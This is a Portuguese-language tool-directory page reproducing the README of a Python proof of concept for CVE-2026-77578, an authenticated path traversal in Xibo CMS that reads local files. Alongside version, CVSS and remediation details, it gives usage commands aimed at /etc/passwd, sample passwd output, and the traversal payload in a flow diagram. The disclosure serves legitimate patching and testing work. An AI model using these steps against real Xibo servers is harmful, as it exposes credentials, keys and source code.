Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-77578 — Prova de conceito em Python que explora o CVE-2026-77578, uma path traversal autenticada no Xibo CMS que lê arquivos locais arbitrários por meio de importações de templates XML manipuladas. | Kitploit
Ferramentas/GitHubGitHub/soskalai/cve-2026-77578
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubsoskalai/cve-2026-77578

CVE-2026-77578

Prova de conceito em Python que explora o CVE-2026-77578, uma path traversal autenticada no Xibo CMS que lê arquivos locais arbitrários por meio de importações de templates XML manipuladas.

Ver Repositório
13há 21 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-77578 — Leitura Arbitrária de Arquivo Local no Xibo CMS

Visão Geral

CVE-2026-77578 é uma vulnerabilidade de Leitura Arbitrária de Arquivo Local autenticada no Xibo CMS.

Um usuário autenticado com privilégios de Administrador ou acesso a Module Templates pode importar um template XML criado especificamente contendo um asset baseado em caminho com uma sequência de travessia. O asset resultante pode então ser acessado através do endpoint de asset do módulo, fazendo com que o Xibo retorne o conteúdo do arquivo local referenciado.

Versões Afetadas e Corrigidas

  • Afetadas: Xibo CMS <= 4.4.3
  • Corrigidas: Xibo CMS >= 4.4.4
  • Remediação recomendada: Atualizar para o Xibo CMS 4.4.4 ou posterior.

Detalhes da Vulnerabilidade

  • CVE: CVE-2026-77578
  • GHSA: GHSA-pc3g-2hhm-46qc
  • Tipo de Vulnerabilidade: CWE-22 — Path Traversal
  • Autenticação: Necessária
  • Privilégio necessário: Acesso ao recurso Developer Template
  • Severidade: Alta
  • CVSS v3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
  • Impacto: Leitura de arquivos acessíveis ao usuário do servidor web

Prova de Conceito

Aviso Oficial do Xibo

O Xibo publicou a vulnerabilidade como GHSA-pc3g-2hhm-46qc, confirmando que as versões <= 4.4.3 são afetadas e >= 4.4.4 estão corrigidas. O aviso atribui severidade Alta com uma pontuação CVSS v3.1 de 8.8 e identifica CVE-2026-77578.

O PoC em Python fornecido automatiza o processo de exploração:

  1. Autentica-se no Xibo CMS.
  2. Recupera o token CSRF da página Module Templates.
  3. Gera um identificador de asset único.
  4. Envia um template XML criado especificamente através de /developer/template/import.
  5. O XML contém um asset baseado em caminho usando uma sequência de travessia de caminho relativo.
  6. Solicita o asset resultante através de /module/asset/<asset-id>.
  7. Exibe o conteúdo do arquivo local solicitado.

Uso

python3 poc.py <URL> -u <USERNAME> -p <PASSWORD> -f <FILE>

Exemplo:

python3 poc.py http://localhost \
    -u xibo_admin \
    -p password \
    -f /etc/passwd

Outro exemplo:

python3 poc.py http://localhost \
    -u xibo_admin \
    -p password \
    -f /etc/os-release

A opção -f tem como padrão /etc/passwd.

Exemplo de Saída

O seguinte demonstra a recuperação bem-sucedida de /etc/passwd:

==============================================
 FILE CONTENT
==============================================

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

CVE-2026-77578 PoC Output

Fluxo Técnico

Authenticated User
        |
        v
GET /developer/template/view
        |
        v
Extract X-XSRF-TOKEN
        |
        v
POST /developer/template/import
        |
        |  Crafted XML
        |  path="../../../../../etc/passwd"
        v
Xibo creates the asset
        |
        v
GET /module/asset/<asset-id>
        |
        v
Contents of local file returned

Validação

A vulnerabilidade foi validada com sucesso contra múltiplos arquivos em um ambiente de teste local do Xibo CMS 4.4.3, incluindo:

  • /etc/passwd
  • /etc/hosts
  • /etc/os-release
  • /var/www/cms/web/index.php

O teste com o arquivo de código-fonte PHP demonstra que o problema é capaz de retornar código-fonte da aplicação, não apenas metadados do sistema.

Impacto

A exploração bem-sucedida permite que um atacante autenticado com os privilégios necessários de Module Templates leia arquivos arbitrários acessíveis ao processo da aplicação Xibo.

Dependendo da implantação, isso pode expor:

  • Código-fonte da aplicação
  • Arquivos de configuração
  • Credenciais
  • Chaves de API
  • Informações de conexão com o banco de dados
  • Outros dados sensíveis do sistema de arquivos

Aviso Legal

Esta prova de conceito é fornecida apenas para fins de pesquisa de segurança autorizada e testes defensivos.

Teste apenas sistemas que você possui ou tem permissão explícita para avaliar.

Estrutura do Repositório

CVE-2026-77578/
├── poc.py
├── README.md
├── LICENSE
├── .gitignore
└── screenshots/
    └── poc-output.png
Baixar ferramenta